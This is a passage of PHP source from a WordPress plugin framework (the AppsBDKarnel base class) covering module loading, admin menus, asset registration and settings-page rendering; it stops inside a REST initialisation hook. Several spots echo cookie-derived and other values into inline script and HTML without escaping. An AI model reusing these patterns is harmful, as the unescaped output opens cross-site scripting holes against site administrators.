        }
	}
}
	if(!class_exists("AppsBDKarnel")) {
		abstract class AppsBDKarnel {
			public static $appsbd_globalJS;
			public static $appsbd_globalCss;
			public static $setAppProperies;
			
			public $moduleList = [];
			public $pluginFile;
			public $pluginBaseName;
			private static $appGlobalVar = [];
			private static $_instence = [];
			private static $_instence_base = [];
			public $pluginName;
			public $pluginVersion;
			public $isTabMenu = false;
			protected static $warningMessage;
			protected static $errorMessage = [];
			protected static $infoMessage = [];
			protected static $hiddenFilelds = [];
			protected $isDevelopmode = false;
			protected $isDemoMode = false;
			private $isLoadJqGrid = false;
			public $pluginIconClass;
			public $mainMenuIconClass;
			public $_topmenu = [];
			public $_set_action_prefix = "";
			
			public $licenseMessage = "";
			public $showMessage = false;
			private $is_module_loaded = false;
			public $pluginSlugWitoutChar = "";
			public $menuTitle;
		    public  $pluginSlugName;
		    public $bootstrapVersion='4.3.1';
		    public static $_admin_notice=[];
			/**
			 * @return bool
			 */
			final public function isModuleLoaded() {
				return $this->is_module_loaded;
			}
			
			/**
			 * @param bool $is_module_loaded
			 */
			public function setIsModuleLoaded( $is_module_loaded ) {
				$this->is_module_loaded = $is_module_loaded;
			}
			
			/**
			 * @return array
			 */
			public function GetAppGlobalVar() {
				return self::$appGlobalVar;
			}
			function AddAdminNotice($msg){
			    $id=hash("crc32b",$msg);
			    static::$_admin_notice[$id]=$msg;
            }
			function is_countable( $vars ) {
				if ( function_exists( "is_countable" ) ) {
					return is_countable( $vars );
				} else {
					if ( is_string( $vars ) || is_bool( $vars ) ) {
						return false;
					}
					
					return is_array( $vars ) || is_object( $vars );
				}
			}
			
			function AddTopMenu( $title, $icon, $func, $class = '', $isTab = true, $attr = [] ) {
				$n        = new stdClass();
				$n->title = $title;
				$n->func  = $func;
				$n->icon  = $icon;
				$n->class = $class;
				$n->istab = $isTab;
				$n->attr  = "";
				if ( $this->is_countable( $attr ) && count( $attr ) > 0 ) {
					foreach ( $attr as $ke => $v ) {
						$n->attr .= ' ' . $ke . '="' . $v . '" ';
					}
				}
				
				$this->_topmenu[] = $n;
			}
			
			/**
			 * @param array $appGlobalVar
			 */
			public function AddAppGlobalVar( $key, $value ) {
				self::$appGlobalVar[ $key ] = $this->__( $value );
			}
			/**
			 * @param mixed $menuTitle
			 */
			public function setMenuTitle( $menuTitle ) {
				$this->menuTitle = $menuTitle;
			}
			/**
			 * @return bool
			 */
			public function isDevelopmode() {
				return $this->isDevelopmode;
			}
			
			/**
			 * @param bool $isDevelopmode
			 */
			public function setIsDevelopmode( $isDevelopmode ) {
				$this->isDevelopmode = $isDevelopmode;
			}
			
			/**
			 * @return bool
			 */
			public function isLoadJqGrid() {
				return $this->isLoadJqGrid;
			}
			/**
			 * @param bool $isLoadJqGrid
			 */
			public function SetIsLoadJqGrid( $isLoadJqGrid ) {
				$this->isLoadJqGrid = $isLoadJqGrid;
			}
			
			public function SetPluginIconClass( $class ,$mainMenuIconClass='') {
				$this->pluginIconClass = $class;
				if(empty($mainMenuIconClass)){
					$mainMenuIconClass=$class;
                }
				$this->mainMenuIconClass = $mainMenuIconClass;
			}
			
			/**
			 * @param string $set_action_prefix
			 */
			public function setSetActionPrefix( $set_action_prefix ) {
				$this->_set_action_prefix = $set_action_prefix;
			}
			
			/**
			 * @return string
			 */
			public function getHookActionStr( $str ) {
				return $this->_set_action_prefix . "/" . $str;
			}
			
			/**
			 * @return bool
			 */
			public function isDemoMode() {
				return $this->isDemoMode;
			}
			
			/**
			 * @param bool $isDemoMode
			 */
			public function setIsDemoMode( $isDemoMode ) {
				$this->isDemoMode = $isDemoMode;
			}
			
			
			abstract function GetHeaderHtml();
			
			abstract function GetFooterHtml();
			
			function __construct( $pluginBaseFile, $version = '1.0.0' ) {
				$this->pluginFile                              = $pluginBaseFile;
				$this->menuTitle=$this->pluginName;
				self::$_instence[ get_class( $this ) ]         = &$this;
				self::$_instence_base[ $this->pluginBaseName ] = &self::$_instence[ get_class( $this ) ];
				spl_autoload_register( array( $this, "_myautoload_method" ) );
				$this->pluginSlugName = &$this->pluginBaseName;
				$this->pluginSlugWitoutChar = strtoupper( preg_replace( '/[^a-zA-z]/', '', $this->pluginBaseName ) );
				if ( is_callable( $this->pluginSlugWitoutChar . "_initialize" ) ) {
					call_user_func( $this->pluginSlugWitoutChar . "_initialize" );
				}
			}
			
			function initialize() {
			
			}
			
			public static function __callStatic( $func, $args ) {
				if ( isset( self::$setAppProperies[ $func ] ) ) {
					return call_user_func_array( self::$setAppProperies[ $func ], $args );
				}
				
				return;
			}
			
			public static function SetProptety( $name, $value ) {
				self::$setAppProperies[ $name ] = $value;
			}
			
			function __destruct() {
				if ( $this->isDevelopmode ) {
					$qu   = AppsBDModel::GetTotalQueriesForLog();
					$path = plugin_dir_path( $this->pluginFile ) . "logs/";
					if ( is_writable( $path ) ) {
						if ( ! is_dir( $path ) ) {
							mkdir( $path, 0740, true );
						}
						$path .= "queries.sql";
						//if (is_writable($filename)) {
						if ( file_exists( $path ) && filesize( $path ) > ( 1024 * 500 ) ) {
							unlink( $path );
						}
						if ( ! empty( $qu ) ) {
							$fh = fopen( $path, 'a' );
							if ( $fh ) {
								$count   = AppsBDModel::GetTotalQueriesCountStr();
								$queries = "-- " . get_permalink() . "----" . ( date( 'Y-m-d h:i:s A' ) ) . "--$count\n";
								$queries .= $qu;
								$queries .= "-- -----------------------------------------------------\n\n";
								fwrite( $fh, $queries );
								fclose( $fh );
							}
						}
					}
				}
			}
			
			final function CheckPluginVersionUpdate() {
				$db_version = get_option( "APBD_pv_" . $this->pluginBaseName, "" );
				if ( empty( $db_version ) || $db_version != $this->pluginVersion ) {
					update_option( "APBD_pv_" . $this->pluginBaseName, $this->pluginVersion ) || add_option( "APBD_pv_" . $this->pluginBaseName, $this->pluginVersion );
					if ( $this->is_countable( $this->moduleList ) ) {
						foreach ( $this->moduleList as $moduleObject ) {
							//$moduleObject=new APPSBDBase();
							$moduleObject->OnTableCreate();
							$moduleObject->OnPluginVersionUpdated( $this->pluginVersion,$db_version);
						}
					}
				}
			}
			
			public function _myautoload_method( $class ) {
				$basepath  = $path = plugin_dir_path( $this->pluginFile );
				$firstchar = substr( $class, 0, 1 );
				if ( strtoupper( $firstchar ) == "M" ) {
					$modelfilename = $basepath . "models/";
					if ( file_exists( $modelfilename . "database/{$class}.php" ) ) {
						APBD_LoadDatabaseModel( $this->pluginFile, $class, $class );
						return;
					}elseif ( file_exists( $modelfilename . "{$class}.php" ) ) {
						APBD_Load_Any( $modelfilename . "{$class}.php" );
					}
				} elseif ( file_exists( $basepath . "libs/{$class}.php" ) ) {
					APBD_LoadLib( $this->pluginFile, $class );
				} elseif ( file_exists( $basepath . "core/{$class}.php" ) ) {
					APBD_Load_Any( $basepath . "core/{$class}.php", $class );
				} elseif ( file_exists( $basepath . "appcore/{$class}.php" ) ) {
					APBD_Load_Any( $basepath . "appcore/{$class}.php", $class );
				}
				
			}
			
			public static function AddError( $msg ) {
				self::$errorMessage[] = $msg;
			}
			
			public static function AddWarning( $msg ) {
				self::$warningMessage[] = $msg;
			}
			
			public static function AddInfo( $msg ) {
				self::$infoMessage[] = $msg;
			}
			
			public static function GetError( $prefix = '', $postfix = '' ) {
				if ( count( self::$errorMessage ) > 0 ) {
					return $prefix . implode( $postfix . $prefix, self::$errorMessage ) . $postfix;
				}
				
				return '';
			}
			
			public static function GetInfo( $prefix = '', $postfix = '' ) {
				if ( count( self::$infoMessage ) > 0 ) {
					return $prefix . implode( $postfix . $prefix, self::$infoMessage ) . $postfix;
				}
				
				return '';
			}
			
			public static function GetWarning( $prefix = '', $postfix = '' ) {
				if ( is_array(self::$warningMessage) && count( self::$warningMessage ) > 0 ) {
					return $prefix . implode( $postfix . $prefix, self::$warningMessage ) . $postfix;
				}
				
				return '';
			}
			
			public static function GetMsg( $prefix1 = '', $prefix2 = '', $prefix3 = '', $postfix = '' ) {
				$str = self::GetError( $prefix2, $postfix );
				$str .= self::GetInfo( $prefix1, $postfix );
				$str .= self::GetWarning( $prefix3, $postfix );
				if ( ! empty( $str ) ) {
					return '<div class="d-m-b">' . $str . '</div>';
				}
				
				return '';
			}
			
			public static function HasUIMsg() {
				return count( self::$infoMessage ) > 0 || count( self::$errorMessage ) > 0;
			}
			
			public static function AddHiddenFields( $key, $value ) {
				self::$hiddenFilelds[ $key ] = $value;
			}
			
			public static function AddOldFields( $key, $value ) {
				self::AddHiddenFields( "old_" . $key, $value );
			}
			
			public static function GetHiddenFieldsArray() {
				return self::$hiddenFilelds;
			}
			
			public static function GetHiddenFieldsHTML() {
				ob_start();
				foreach ( self::$hiddenFilelds as $name => $value ) {
					?>
					<input type="hidden" name="<?php echo $name; ?>" value="<?php echo $value; ?>"/>
					<?php
				}
				
				return ob_get_clean();
			}
			
			function AddCoreLib( $libname ) {
				if ( ! class_exists( $libname ) ) {
					$path = dirname( __FILE__ ) . "/" . $libname . ".php";
					if ( file_exists( $path ) ) {
						@include_once( $path );
					}
				}
			}
			
			function AddLib( $libname ) {
				if ( ! class_exists( $libname ) ) {
					$path = plugin_dir_path( $this->pluginFile ) . "lib/" . $libname . ".php";
					if ( file_exists( $path ) ) {
						@include_once( $path );
					}
				}
			}
			
			/**
			 *
			 * @return self
			 */
			static function &GetInstance() {
				return self::$_instence[ static::class ];
			}
			
			/**
			 * @param $base
			 *
			 * @return self
			 */
			static function &GetInstanceByBase( $base ) {
				return self::$_instence_base[ $base ];
			}
			
			/**
			 * @param $moduleClassName
			 */
			function AddModule( $moduleClassName ) {
				if ( ! class_exists( $moduleClassName ) ) {
					$path = plugin_dir_path( $this->pluginFile ) . "modules/" . $moduleClassName . ".php";
					if ( file_exists( $path ) ) {
						@include_once( $path );
					}
				}
				$this->moduleList[] = new $moduleClassName( $this->pluginBaseName, $this );
				if ( ! $this->isTabMenu ) {
					if ( $this->is_countable( $this->moduleList ) && count( $this->moduleList ) > 1 ) {
						$this->isTabMenu = true;
					}
				}
			}
			
			function WPAdminCheckDefaultCssScript( $src ) {
			 
				if ( empty( $src ) || $src == 1 || preg_match( "/\/uilib|\/css\/all-css.css|\/wp-admin\/|\/wp-includes\/|\/plugins\/woocommerce\/assets\/|\/plugins\/elementor\/assets\/css\/admin/", $src )  ) {
					return true;
				}
				
				return false;
			}
			
			function AddJquery() {
				wp_enqueue_script( 'jquery' );
			}
			
			function WpHead() {
			
			}
			public function BasePath($relative_path=''){
				return  plugin_dir_path( $this->pluginFile ).$relative_path;
			}
			function AdminScriptData() {
				?>
				<script type="text/javascript">
                    var <?php echo $this->pluginSlugWitoutChar;?>=
                    "<?php echo plugins_url( "", $this->pluginFile );?>";
                    if (typeof appGlobalLang == "undefined") {
                        var appGlobalLang =<?php echo json_encode( self::$appGlobalVar ); ?>;
                    } else {
                        jQuery(document).ready(function ($) {
                            appGlobalLang = $.extend(appGlobalLang, <?php echo json_encode( self::$appGlobalVar ); ?>);
                        });
                    }
					<?php
					foreach ( $this->moduleList as $moduleObject ) {
						//$moduleObject=new APPSBDBase();
						$moduleObject->AdminScriptData();
					}
					?>
				</script>
				<?php
			}
			
			function AddAdminStyle( $StyleId, $StyleFileName = '', $isFromRoot = false, $deps = [] ) {
				if ( $isFromRoot ) {
					$start = "/";
				} else {
					$start = "/css/";
				}
				
				if ( ! empty( $StyleFileName ) ) {
					self::RegisterAdminStyle( $StyleId, plugins_url( $start . $StyleFileName, $this->pluginFile ), $deps, $this->pluginVersion );
				} else {
					self::RegisterAdminStyle( $StyleId );
				}
				
			}
			
			function AddAdminScript( $ScriptId, $ScriptFileName = '', $isFromRoot = false, $deps = [] ) {
				if ( $isFromRoot ) {
					$start = "/";
				} else {
					$start = "/js/";
				}
				if ( ! empty( $ScriptFileName ) ) {
					self::RegisterAdminScript( $ScriptId, plugins_url( $start . $ScriptFileName, $this->pluginFile ), $deps, $this->pluginVersion );
				} else {
					self::RegisterAdminScript( $ScriptId, '' );
				}
			}
			
			static function RegisterAdminStyle( $handle, $src = "", $deps = [], $ver = false, $in_footer = false ) {
				//echo $handle.", ";
				self::$appsbd_globalCss[] = $handle;
				if ( ! empty( $src ) ) {
					wp_register_style( $handle, $src, $deps, $ver, $in_footer );
				}
				wp_enqueue_style( $handle );
			}
			
			static function RegisterAdminScript( $handle, $src = "", $deps = [], $ver = false, $in_footer = false ) {
				self::$appsbd_globalJS[] = $handle;
				if ( ! empty( $src ) ) {
					wp_deregister_script( $handle );
					wp_register_script( $handle, $src, $deps, $ver, $in_footer );
				}
				wp_enqueue_script( $handle );
			}
			
			function OnAdminMainOptionStyles() {
				
				foreach ( $this->moduleList as $moduleObject ) {
					if ( $moduleObject->OnAdminMainOptionStyles( $this ) ) {
					
					}
				}
			}
			
			function OnAdminGlobalStyles() {
				$this->AddAdminStyle( "appsbd-product-icon", "uilib/product-icon/icon.css", true );
				$this->AddAdminStyle( $this->pluginSlugWitoutChar."-apsbdpluginall", "all-css.css" );
				
				
				foreach ( $this->moduleList as $moduleObject ) {
					if ( $moduleObject->OnAdminGlobalStyles() ) {
					
					}
				}
			}
			function OnAdminNotices() {
				echo implode("",static::$_admin_notice);
			}
			
			function OnAdminAppStyles() {
				$this->AddAdminStyle( 'wp-color-picker' );
				$this->AddAdminStyle( "apsbdboostrap", "uilib/boostrap/".$this->bootstrapVersion."/appsbdbootstrap.css", true );
				$this->AddAdminStyle( "font-awesome-4.7.0", "uilib/font-awesome/4.7.0/css/font-awesome.min.css", true );
				$this->AddAdminStyle( "apboostrap_magnificcss", "uilib/magnific/apbd-magnific-bootstrap.css", true );
				$this->AddAdminStyle( "apboostrap_validatior_css", "uilib/bootstrapValidation/css/bootstrapValidator.min.css", true );
				
				$this->AddAdminStyle( "apboostrap_sgnofi_css1", "uilib/sliding-growl-notification/css/notify.css", true );
				$this->AddAdminStyle( "apboostrap_sweetalertcss", "uilib/sweetalert/sweetalert.css", true );
				$this->AddAdminStyle( "apboostrap_datetimepickercss", "uilib/datetimepicker/jquery.datetimepicker.css", true );
				$this->AddAdminStyle( "apboostrap_boostrap_select", "uilib/boostrap-select/css/bootstrap-select-bundle.css", true );
				$this->AddAdminStyle( "appsbd-icon", "uilib/icon/style.css", true );
				//$this->AddAdminStyle("uilib/sliding-growl-notification/css/themes/right-bottom.css","apboostrap_sgnofi_css2",true);
				if ( $this->isLoadJqGrid ) {
					//$this->AddAdminStyle( "jquery-grid-ui", "uilib/jqui/jquery-ui.min.css", true );
					$this->AddAdminStyle( "jquery-grid", "uilib/grid/css/ui.jqgrid.css", true );
				}
				$this->AddAdminStyle( "appsbdcore", "admin-core-style.css" );
				
				foreach ( $this->moduleList as $moduleObject ) {
					//$moduleObject=new APPSBDBase();
					$moduleObject->AdminStyles();
				}
			}
			
			function OnAdminAppScripts() {
				$this->AddAdminScript( "boostrap4", "uilib/boostrap/".$this->bootstrapVersion."/js/bootstrap.bundle.min.js", true );
				$this->AddAdminScript( "apboostrap_validatior_js", "uilib/bootstrapValidation/js/bootstrapValidator4.min.js", true );
				$this->AddAdminScript( "apboostrap_magnificjs", "uilib/magnific/magnific.min.js", true );
				$this->AddAdminScript( "apboostrap_sgnofi_js", "uilib/sliding-growl-notification/js/notify.min.js", true );
				$this->AddAdminScript( "apboostrap_sweetalertjs", "uilib/sweetalert/sweetalert.min.js", true );
				$this->AddAdminScript( "apboostrap_datetimepickercss", "uilib/datetimepicker/jquery.datetimepicker.js", true );
				$this->AddAdminScript( "apboostrap_boostrap_select", "uilib/boostrap-select/js/bootstrap-select.min.js", true );
				$this->AddAdminScript( "apboostrap_ajax_boostrap_select", "uilib/boostrap-select/js/ajax-bootstrap-select.js", true );
				$this->AddAdminScript( "apd-main-js", "main.min.js", false, [ 'wp-color-picker' ] );
				if ( $this->isLoadJqGrid ) {
					$this->AddAdminScript( "jquery-grid-js-118n", "uilib/grid/js/i18n/grid.locale-en.js", true, [ 'jquery' ] );
					$this->AddAdminScript( "jquery-grid-js", "uilib/grid/js/jquery.jqGrid.src.min.js", true, [ 'jquery' ] );
				}
				
				foreach ( $this->moduleList as $moduleObject ) {
					//$moduleObject=new APPSBDBase();
					$moduleObject->AdminScripts();
				}
			}
			
			function OnAdminMainOptionScripts() {
				
				foreach ( $this->moduleList as $moduleObject ) {
					if ( $moduleObject->OnAdminMainOptionScripts() ) {
					
					}
				}
			}
			
			function OnAdminGlobalScripts() {
				
				foreach ( $this->moduleList as $moduleObject ) {
					if ( $moduleObject->OnAdminGlobalScripts() ) {
					
					}
				}
			}
			
			
			final function SetAdminStyle() {
				
				if ( is_callable( $this->pluginSlugWitoutChar . "_SetAdminStyle" ) ) {
					call_user_func( $this->pluginSlugWitoutChar . "_SetAdminStyle" );
				}
			}
			
			function SetAdminScript() {
				if ( is_callable( $this->pluginSlugWitoutChar . "_SetAdminScript" ) ) {
					call_user_func( $this->pluginSlugWitoutChar . "_SetAdminScript" );
				}
			}
			
			
			function SetClientScript() {
				foreach ( $this->moduleList as $moduleObject ) {
					//$moduleObject=new APPSBDBase();
					if ( $moduleObject->IsActive() ) {
						$moduleObject->ClientScript();
					}
				}
			}
			
			function SetClientStyle() {
				foreach ( $this->moduleList as $moduleObject ) {
					//$moduleObject=new APPSBDBase();
					if ( $moduleObject->IsActive() ) {
						$moduleObject->ClientStyle();
					}
				}
			}
			
			function CheckAdminPage() {
				$page = ! empty( $_REQUEST['page'] ) ? $_REQUEST['page'] : "";
				$page = trim( $page );
				if ( ! empty( $page ) ) {
					if ( $page == $this->pluginBaseName ) {
						return true;
					}
					foreach ( $this->moduleList as $moduleObject ) {
						//$moduleObject=new APPSBDBase();
						if ( $moduleObject->IsPageCheck( $page ) ) {
							return true;
						}
					}
				}
				
				return false;
				
			}
			
			static function IsMainOptionPage() {
				$file = basename( $_SERVER['SCRIPT_FILENAME'] );
				if ( $file == "plugins.php" ) {
					if ( empty( $_REQUEST['page'] ) ) {
						return true;
					}
				}
				
				return false;
			}
			
			final public function _OnInit() {
				if ( is_callable( $this->pluginSlugWitoutChar . "_init" ) ) {
					call_user_func( $this->pluginSlugWitoutChar . "_init" );
				}
			}
			
			final function AdminMenu() {
				if ( is_callable( $this->pluginSlugWitoutChar . "_AdminMenu" ) ) {
					call_user_func( $this->pluginSlugWitoutChar . "_AdminMenu" );
				}
			}
			
			function _e( $string, $parameter = NULL, $_ = NULL ) {
				$args = func_get_args();
				echo call_user_func_array( [ $this, "__" ], $args );
			}
			
			function _ee( $string, $parameter = NULL, $_ = NULL ) {
				$args = func_get_args();
				foreach ( $args as &$arg ) {
					if ( is_string( $arg ) ) {
						$arg = $this->__( $arg );
					}
				}
				echo call_user_func_array( "sprintf", $args );
			}
			
			function __( $string, $parameter = NULL, $_ = NULL ) {
				$args = func_get_args();
				array_splice( $args, 1, 0, array( $this->pluginBaseName ) );
				
				return call_user_func_array( "APBD_Lan__", $args );
			}
			
			function ___( $string, $parameter = NULL, $_ = NULL ) {
				$args = func_get_args();
				foreach ( $args as &$arg ) {
					if ( is_string( $arg ) ) {
						$arg = $this->__( $arg );
					}
				}
				
				return call_user_func_array( "sprintf", $args );
			}
			
			function OnInit() {
				//$this->AddAdminStyle( "admin-core-style.css", "apsbdplugincore" );
			}
			
			final function LinksActions( $links ) {
				$links[] = "<a class='edit coption' href='admin.php?page=" . $this->pluginBaseName . "'>" . $this->__( "Settings", $this->pluginBaseName ) . "</a>";
				foreach ( $this->moduleList as $moduleObject ) {
					$moduleObject->LinksActions( $links );
				}
				
				return $links;
			}
			
			final function PluginRowMeta( $plugin_meta, $plugin_file ) {
				if ( $plugin_file == plugin_basename( $this->pluginFile ) ) {
					foreach ( $this->moduleList as $moduleObject ) {
						$moduleObject->PluginRowMeta( $plugin_meta );
					}
				}
				
				return $plugin_meta;
			}
			
			final function SetClientScriptBase() {
				$this->SetClientScript();
			}
			
			final function SetClientStyleBase() {
				$this->SetClientStyle();
			}
			
			final function SetAdminScriptBase() {
				$this->SetAdminScript();
			}
			
			final function SetAdminStyleBase() {
				$this->SetAdminStyle();
			}
			
			final function OnActive() {
				foreach ( $this->moduleList as $moduleObject ) {
					$moduleObject->OnTableCreate();
					$moduleObject->OnActive();
				}
			}
			
			final function OnDeactive() {
				foreach ( $this->moduleList as $moduleObject ) {
					if ( $moduleObject->OnDeactive() ) {
						return true;
					}
				}
			}
			
			function getActiveModuleId() {
				$selected = ( ! empty( $_COOKIE[ $this->pluginBaseName . '_st_menu' ] ) ) ? $_COOKIE[ $this->pluginBaseName . '_st_menu' ] : "";
				if ( ! empty( $selected ) ) {
					return $selected;
				}
				if ( $this->is_countable( $this->moduleList ) && count( $this->moduleList ) > 0 ) {
					return $this->moduleList[0]->GetModuleId();
				}
				
				return "";
			}
			
			/**
			 * @param AppsBDBaseModule $moduleObject
			 * @param string $currentModuleId
			 */
			function geMenuTabItem( $moduleObject, $activeModuleId ) {
				$currentModuleId = $moduleObject->GetModuleId();
				?>
				<li class="nav-item">
					<a id="tb-<?php echo $currentModuleId; ?>" data-module-id="<?php echo $currentModuleId; ?>"
					   title="<?php echo $moduleObject->GetMenuTitle(); ?>"
					   data-placement="right"
					   class="app-tooltip nav-link <?php echo $activeModuleId == $currentModuleId ? ' active ' : ''; ?>"
					   data-toggle="pill" href="#<?php echo $currentModuleId; ?>">
						<i class="<?php echo $moduleObject->GetMenuIcon(); ?> pull-left"></i>
						<span class="apd-title"><?php echo $moduleObject->GetMenuTitle(); ?></span>
						<?php echo $moduleObject->GetMenuCounter(); ?>
						<span class="apd-sub-title"><?php echo $moduleObject->GetMenuSubTitle(); ?></span>
					</a>
				</li>
				<?php
			}
			
			function getMenuTab() {
				if ( ! $this->isTabMenu ) {
					return;
				}
				$activeModuleId  = $this->getActiveModuleId();
				$isMenuOpen      = ! isset( $_COOKIE[ $this->pluginBaseName . '_sel_menu' ] ) || ! empty( $_COOKIE[ $this->pluginBaseName . '_sel_menu' ] );
				$lastMenu        = NULL;
				$currentModuleId = "";
				?>
				<!-- Nav pills -->
				<nav id="apd-sidebar" class="<?php echo( $isMenuOpen ? ' active ' : '' ); ?>">
					<ul class="nav flex-column">
						<?php foreach ( $this->moduleList as $moduleObject ) {
							if ( $moduleObject->isDisabledMenu() ) {
								continue;
							}
							if ( $moduleObject->isHiddenModule() ) {
								continue;
							}
							if ( empty( $lastMenu ) && $moduleObject->isLastMenu() ) {
								$lastMenu = $moduleObject;
								continue;
							}
							$this->geMenuTabItem( $moduleObject, $activeModuleId );
						}
							if ( ! empty( $lastMenu ) ) {
								$this->geMenuTabItem( $lastMenu, $activeModuleId );
							}
						?>
					
					</ul>
				</nav>
				<script type="text/javascript">
                    jQuery(document).ready(function ($) {
                        $('#apd-sidebar a[data-toggle="pill"]').on('shown.bs.tab', function (e) {
                            e.target // newly activated tab
                            e.relatedTarget // previous active tab
                            var onactivated = $(e.target).data("module-id");
                            try {
                                APPSBDAPPJS.core.CallOnTabActive(onactivated);
                                APPSBDAPPJS.core.SetCookie("<?php echo $this->pluginBaseName . '_st_menu' ?>", onactivated, 30, "/");
                            } catch (e) {
                            }
                            try {
                                $('.app-right-menu .navbar-nav .nav-link').removeClass("active");
                            } catch (e) {
                            }
                        })

                        $('.app-right-menu .navbar-nav .nav-link').on('click', function (e) {
                            $("#apd-sidebar .nav .nav-item a.nav-link").removeClass("active");
                        });
                        try {
                            APPSBDAPPJS.core.CallOnTabActive("<?php echo $activeModuleId; ?>");
                        } catch (e) {
                        }
                    });
				
				</script>
				<?php
			}
			
			function OptionFormBase() {
				$isMenuOpen = ! isset( $_COOKIE[ $this->pluginBaseName . '_sel_menu' ] ) || ! empty( $_COOKIE[ $this->pluginBaseName . '_sel_menu' ] );
				?>
				
				<div id="APPSBDWP" class="APPSBDWP" data-cookie-id="<?php echo $this->pluginBaseName; ?>">
					<div class="apsbd-main-container container-fluid">
						
						<div class="apsbd-main-card card">
							<div class="card-header">
								<?php if ( $this->isTabMenu ) { ?>
									<button type="button" id="apd-main-btn"
									        class="btn btn-default pull-left <?php echo $isMenuOpen ? ' mini-menu on-pre-mini ' : ''; ?>">
										<i class="fa fa-align-justify"></i>
									</button>
								<?php } ?>
								<h2 class="apd-app-title">
									<?php if ( empty( $this->pluginIconClass ) ) { ?>
										<img class="apd-plugin-logo"
										     src="<?php echo plugins_url( "images/logo.svg", $this->pluginFile ); ?>"
										     alt="<?php echo $this->pluginName; ?>">
									<?php } else { ?>
										<i class="apnd-plugin-main-icon <?php echo $this->pluginIconClass; ?>"></i> <?php echo $this->pluginName; ?>
									<?php } ?>
								</h2>
								<?php
									if ( $this->is_countable( $this->moduleList ) && count( $this->_topmenu ) > 0 ) {
										?>
										<div class="app-right-menu">
											<nav class="navbar navbar-expand-lg navbar-light bg-light">
												<button class="navbar-toggler" type="button" data-toggle="collapse"
												        data-target="#navbarNavAltMarkup" aria-controls="navbarNavAltMarkup"
												        aria-expanded="false" aria-label="Toggle navigation">
													<i class="fa fa-align-justify"></i>
												</button>
												<div class="collapse navbar-collapse" id="navbarNavAltMarkup">
													<div class="navbar-nav nav-tabs nav">
														<?php foreach ( $this->_topmenu as $skey => $topmenu ) {
															?>
															<a class="<?php echo $topmenu->class; ?> nav-item nav-link top-tab-link" <?php echo $topmenu->istab ? ' data-toggle="tab"  ' : ''; ?>
															   href="<?php echo $topmenu->istab && is_callable( $topmenu->func ) ? '#_t_tab' . $skey : $topmenu->func; ?>" <?php echo $topmenu->attr; ?> ><?php if ( ! empty( $topmenu->icon ) ) { ?>
																	<i class="<?php echo $topmenu->icon; ?>"></i> <?php }
																	echo $topmenu->title; ?></a>
															<?php
														} ?>
													</div>
												</div>
											</nav>
										</div>
									<?php } ?>
							</div>
							<div class="card-body ">
								<?php
									
									if ( $this->isTabMenu ){ ?>
								<div class="wrapper">
									<?php $this->getMenuTab(); ?>
									<!-- Page Content  -->
									<div id="content" class="pos-relative">
										<?php } ?>
										<div id="apbd-app-loader" class="apbd-app-loader ">
											<div class="text-center" id="apbd-app-waiting">
												<img class="max-height-50" src="<?php echo plugins_url( "images/lighboxloader.svg", $this->pluginFile ); ?>"
												    alt="<?php $this->_e( "Loading.." ); ?>">
												<br>
												<h4 data-default-msg="<?php $this->_e( "Loading" ); ?>"></h4>
											</div>
										</div>
										<!-- Tab panes -->
										<div class="<?php echo( $this->isTabMenu ? ' tab-content ' : ' col-md ' ) ?>">
											<?php
												if ( $this->is_countable( $this->moduleList ) && count( $this->moduleList ) > 0 ) {
													$activeClassId = $this->getActiveModuleId();
													foreach ( $this->moduleList as $moduleObject ) {
														if ( $moduleObject->isHiddenModule() ) {
															continue;
														}
														$currentModuleId = $moduleObject->GetModuleId();
														?>
														<div class="apbd-module-container <?php echo $this->isTabMenu ? ' tab-pane ' . ( $activeClassId == $currentModuleId ? ' active ' : '' ) : ''; ?>"
														     id="<?php echo $currentModuleId; ?>">
															<?php
																if ( ! $moduleObject->isDontAddDefaultForm() ){
															?>
															<form class="apbd-module-form <?php echo $moduleObject->getFormClass(); ?>"
															      role="form"
															      id="<?php echo $moduleObject->GetMainFormId(); ?>"
															      action="<?php echo $moduleObject->GetActionUrl( "" ); ?>"
															      method="post" <?php echo $moduleObject->isMultipartForm() ? ' enctype="multipart/form-data" ' : ''; ?>>
																
																<?php
																	}
																	if ( $this->isTabMenu ) {
																		ob_start();
																		$moduleObject->OptionFormHeader();
																		$mheader = ob_get_clean();
																		if ( ! empty( $mheader ) ) {
																			?>
																			<div class="app-module-title clearfix">
																				<?php
																					echo $mheader;
																				?>
																			</div>
																			<?php
																		}
																	}
																?>
																<div class="">
																	<?php
																		$moduleObject->OptionForm(); ?>
																</div>
																<?php if ( ! $moduleObject->isDontAddDefaultForm() ){ ?>
															</form>
														<?php } ?>
														</div>
														<?php
													}
												} else {
													?>
													No module added
													<?php
												}
												
												foreach ( $this->_topmenu as $skey => $topmenu ) {
													if ( $topmenu->istab && is_callable( $topmenu->func ) ) {
														?>
														<div class="tab-pane fade" id="_t_tab<?php echo $skey; ?>">
															<?php call_user_func( $topmenu->func ); ?>
														</div>
														<?php
													}
												} ?>
										</div>
										
										
										<?php if ( $this->isTabMenu ){ ?>
									</div>
								</div>
							<?php }
								do_action($this->getHookActionStr("app-content-footer"));
							?>
							</div>
							<div class="card-footer text-muted text-center">
								<?php echo $this->pluginName ?>, Copyright © <?php echo date( 'Y' ); ?> <a
									href="https://appsbd.com">appsbd.com</a>. All rights reserved.
								<span class="pull-right">Version : <?php echo $this->pluginVersion; ?></span>
							</div>
						</div>
					
					</div>
					<?php do_action($this->getHookActionStr("app-footer")); ?>
				</div>
				<?php
			}
			
			final function PluginUpdate( $transient ) {
				return $transient;
			}
			
			final function checkUpdateInfo( $false, $action, $arg ) {
				return $false;
			}
			
			private function _getHeaderHtml() {
				$this->GetHeaderHtml();
			}
			
			final function StartPlugin() {
				if ( is_callable( $this->pluginSlugWitoutChar . "_StartPlugin" ) ) {
					call_user_func( $this->pluginSlugWitoutChar . "_StartPlugin" );
				}
				$this->CheckPluginVersionUpdate( $this->pluginVersion );
			}
			
		}
	}
	if(!function_exists("APBLIC_init")) {
		function APBLIC_init() {
			$coreObject=APBDLic::GetInstance();
			do_action($coreObject->_set_action_prefix."/register_module",$coreObject);
			load_plugin_textdomain($coreObject->pluginBaseName, FALSE, basename( dirname( $coreObject->pluginFile ) ).'/languages/');
			if($coreObject->isModuleLoaded()) {
				foreach ( $coreObject->moduleList as $moduleObject ) {
					//$moduleObject=new APPSBDBase();
					if ( $moduleObject->OnInit() ) {
						return true;
					}
				}
				$coreObject->OnInit();
			}else{
				add_action( 'rest_api_init', function (){
					$licensor=APBDLicenseSettings::GetModuleInstance()->GetOption("api_end_point","licensor");
					
					
